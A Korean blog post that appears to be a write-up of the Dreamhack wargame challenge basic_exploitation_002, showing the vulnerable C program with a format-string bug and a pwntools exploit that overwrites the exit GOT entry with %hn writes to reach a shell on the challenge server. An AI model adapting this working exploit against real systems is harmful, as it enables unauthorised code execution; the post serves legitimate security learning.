외로운 Nova의 작업실

dreamhack - basic_exploitation_002 본문

Computer App Penetesting/System Vulnerability

dreamhack - basic_exploitation_002

Nova_ 2023. 4. 27. 14:59

- source code

 

#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>


void alarm_handler() {
    puts("TIME OUT");
    exit(-1);
}


void initialize() {
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);

    signal(SIGALRM, alarm_handler);
    alarm(30);
}

void get_shell() {
    system("/bin/sh");
}

int main(int argc, char *argv[]) {

    char buf[0x80];

    initialize();

    read(0, buf, 0x80);
    printf(buf);

    exit(0);
}

 

- exploit code

 

from pwn import *

p = remote("23.81.42.210",22878 )

#getshell = 0x8048609
#0x804 = 2052, 0x8609 = 34313
#34313 - 2052 = 32261

exit = 0x804a024

payload = p32(exit+2) + p32(exit)
payload += b"%2044c%1$hn%32261c%2$hn"

p.send(payload)

p.interactive()

 

- 알게된점

32비트에서는 cdecl 함수호출 규격을 사용하기때문에 아래2개는 같은 의미다.

printf("\x12\x34\x56\x78%123c%1$n")

printf("%123c%1$n", "\x12\x34\x56\x78")

'Computer App Penetesting > System Vulnerability' 카테고리의 다른 글

dreamhack - basic_exploitation_003  (0) 2023.04.28
dreamhack - OOB write up  (0) 2023.04.25
dreamhack - fho write up  (0) 2023.04.24
dreamhack - hook write up  (0) 2023.04.22
dreamhack - oneshot write up  (0) 2023.04.21
Comments